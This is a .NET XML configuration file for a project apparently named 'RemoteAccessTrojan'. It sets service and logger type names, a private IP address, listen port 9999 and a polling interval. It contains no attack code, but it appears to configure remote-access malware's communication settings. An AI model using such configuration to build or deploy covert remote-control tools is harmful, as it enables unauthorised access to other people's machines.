<?xml version="1.0" encoding="utf-8" ?>
<configuration>
    <appSettings>
        <!--Application-->
        <add key="ApplicationServiceTypeName" value="Company.Tools.RemoteAccessTrojan.Application.ApplicationService" />

        <!--Logging-->
        <add key="LoggerTypeName" value="Company.Tools.RemoteAccessTrojan.Infrastructure.Logging.WindowsEventLogger" />
        <add key="EventSource" value="Company.Tools.RemoteAccessTrojan" />

        <!--Communication-->
        <add key="IpAddress" value="172.16.204.227" />
        <add key="ListenPort" value="9999" />
        <add key="PollInterval" value="1000" />
    </appSettings>
</configuration>